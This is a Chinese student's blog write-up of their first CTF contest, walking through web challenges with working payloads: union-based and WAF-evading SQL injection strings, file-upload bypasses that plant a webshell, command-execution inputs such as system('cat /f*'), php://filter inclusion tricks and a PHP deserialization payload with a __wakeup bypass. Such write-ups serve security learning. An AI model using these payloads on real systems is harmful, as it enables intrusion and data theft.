记录第一次ctf比赛

• 第一关是在根据题目提示是在F12里一开始漫无目的的寻找，回头再看看题的时候发现他有提示：看到这都还没找到，有点蠢……然后便往回找，最终找到，第一道题看来是给出的礼物hhhhhhhh
• 第二关是题目提示是菜刀，但是习惯用蚁剑的我便开始了我的蚁剑之旅，点开环境大大的写着密码是wllm，我非常不好意思的直接连接，找到了flag第二关结束
• 第三关的题目提示是基操，给我看的蒙蒙的，点开环境仔细读代码原来是让post传id=wllm然后get传json其中json需要用json格式，代码如下：

那么就是打开火狐浏览器?json={"x":"wllm"}然后post方式id=wllmNB

找到flag

• 第四题的题目问我知道http嘛，那我就要打开我的薄荷了，打开环境后他让我用WLLM的浏览器，这我直接一个抓包然后改掉User-Agent，将WLLM四个大字母放到后面，得意洋洋的放包，结果它告诉我：

这好烦啊，火狐浏览器可以改代理但是没有switchysharp，那我只好再刷新然后在close前加一个

referer: 127.0.0.1

X-Forwarded-For:127.0.0.1

呼！拿到flag了下一题下一题

• 第五题题目提示是easy的md5，这我要看看到底多一贼，代码如下：

wrong!

嗬，&&的第一个条件是$name不等于$password，这家伙，我直接get:?name[]=1同时post:password[]=2！！！！拿下拿下！

• 第六题啦题目是简单的sql注入那我上来一个?id=1'发现不存在sql注入漏洞，不是吧不是吧我又看了一眼题，确定是sql注入啊，百思不得其解的时候我看了网站的标题参数是wllm！！！！把id改为wllm的我直接一套基操

?wllm=1' order by 3%23

?wllm=1' order by 4%23

得到有三个位置

?wllm=0%27%0aUNION%0aSELECT%0a1,GROUP_CONCAT(%27%27,TABLE_NAME),3%0aFROM%0aINFORMATION_SCHEMA.TABLES%0aWHERE%0aTABLE_SCHEMA=DATABASE()%23

查到有两张表

test_tb, users

行吧那就：

?wllm=0' union select 1,group_concat('',column_name),3 from information_schema.columns where table_schema=database() and table_name='users'%23

很伤心，得到了

id, username, password

那么flag一定在test_tb里，冲冲冲！！

?wllm=0' union select 1,group_concat('',column_name),3 from information_schema.columns where table_schema=database() and table_name='test_tb'%23

得到

id, flag

话不多说

?wllm=0' union select 1,flag,3 from test_tb %23

拿到flag我就跑，嘿嘿。

• 第七题是文件上传啦，小心翼翼试试一句话木马，不行啊！然后再上传一个图片试试，哎！~图片可以！！我记得考核大纲上有mini验证那就改掉content-Type:image/jpeg

上传成功！哎打开我的蚁剑，拿下拿下！

• 第八题还是文件上传但是是2.0哈哈哈哈哈哈哈

我迫不及待的打开环境然后

不是前端验证 不是mini验证 不是00截断 不是黑名单过滤不全：12345 不是.htaccess绕过 不是黑名单大小写过滤不全 不是空格后缀名绕过 不是.号绕过

这就很恼火哦，我试着上传图片，发现图片和php上传拦截几乎一样，那就是文件后缀的问题，既然php不行，那就上传图片，后缀改成phtml然后在图片的乱码中插入我的一句话

上传成功！！！打开蚁剑，结束结束！

• 第九题不一样了题目告诉我是简单的rce，这家伙！那我打开环境看看吧，代码如下：

这这这！！！让我远程url函数？那我可不客气了

?url=system(ls);

得到了：

那就：

?url=system("ls%20/");

得到了：

那就：

?url=system("cat /f*");

拿下！！！

• 第十题是babyrce，代码如下：

 小饼干最好吃啦！

嗬！临时凭证！我打开薄荷刷新页面cookie改为admin=1得到：

那我肯定打开 rasalghul.php

得到代码：

?url=system(ls);

返回了原页面。。。。。。。

?url=system("ls /");

返回了原页面

那我只好 

我再

?url=system("ls$IFS/");

……（此处省略我的坐牢过程）

我试了又试发现不行便看了看网页源代码，发现已经有函数了，那就只好

?url=ls%09/

?url=cat%09/f*

拿下拿下！！

• 第十一题就有意思了，他问我题在哪，我还想知道呢！不知道怎么办的我打开网页源代码，发现最后注释了个东西，

第一条是：User-agent，即搜索引擎蜘蛛的名称；第二条是：Disallow，即要拦截的部分。

这家伙！这不就是robots.txt嘛。打开robots.txt文件得到：

那我就只好继续打开cl45s.php。。。得到代码：

那就开始写payload吧

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

拿下！！

另外我记得老师教过这个的poc？

来吧来吧

菜鸟工具php在线运行得到

O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D

那我就不客气了?

p=O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D

拿下拿下

• 第十二题的题目是include那就是文件包含漏洞了！！他让我传一个file试试，挑衅我？？哈哈哈我直接?file=flag.php！切，就给我这个

 flag 在flag.php中

伪协议伪协议！！冲冲冲

/?file=php://filter/read=convert.base64-encode/resource=flag.php

得到了base64加密后的字符串，解密一下吧！

 拿下！！

反序列化问题学习中老师教我先看代码！这个是创建对象

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

类型:长度:"名字":类中变量的个数:{类型:长度:"名字";类型:长度:"值";......}

类型有很多   
a - array  
b - boolean  
d - double  
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string

但是要绕过wakeup那么就改为

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

拿下！！！

• 第十六题是PseudoProtocols，打开后他告诉我找hint.php但是看域名的后缀明明是文件包含的样子啊！！然后我就/index.php?wllm=hint.php啥也没有。这就很恼火了，思路断了啊，打开百度查一查，发现hint.php里面可以调用include函数，那就再来个伪协议！！！

/index.php?wllm=php://filter/read=convert.base64-encode/resource=hint.php

得到PD9waHANCi8vZ28gdG8gL3Rlc3QyMjIyMjIyMjIyMjIyLnBocA0KPz4=

好了，md5解密吧。得到

那就go！go！go！得到代码：  

file_get_contents！！！！这这这！！伪协议嘛！

Get：a=php://input

Post: I want flag

拿下！！

• 第十七题是sql注入给我显示Want Me? Cross the Waf那我只好用薄荷打开爆破模块查看禁用的字符

 这可真烦人啊！！大小写？！

百度帮我解决困难！%0a可以代替空格！是不等于!是非!(table_schemaxxx)来代替=

或者用like！！

/?wllm=0'%0aUNiON%0aSElECT%0a1,2,(sElEct/**/group_concat(tablE_namE)/**/from/**/infOrmation_schEma.tablEs/**/whErE/**/tablE_schEma/**/likE/**/'tEst_db')%23

/?wllm=0'%0aUNiON%0aSElECT%0a1,2,(sElEct/**/group_concat(column_namE)/**/from/**/infOrmation_schEma.columns/**/whErE/**/tablE_Name/**/likE/**/'LTLT_flag')%23

取到的虽然不是整个flag，但是我们有mid函数哈哈哈哈哈

拿下拿下！！

这是我会做的全部题啦，写的不是很详细，后续会记录我学习这些的过程，来详细的写每一个题啦！当然我还有好多不会做，这些就要靠我进团队之后dalao带着我了，希望团队大佬可以带我向着网络安全更深处进发！！

finalrce

hardrce

pop

babyunser

hardrce_3

没有做出来的题是这些！等我做出来再发下一个文啦！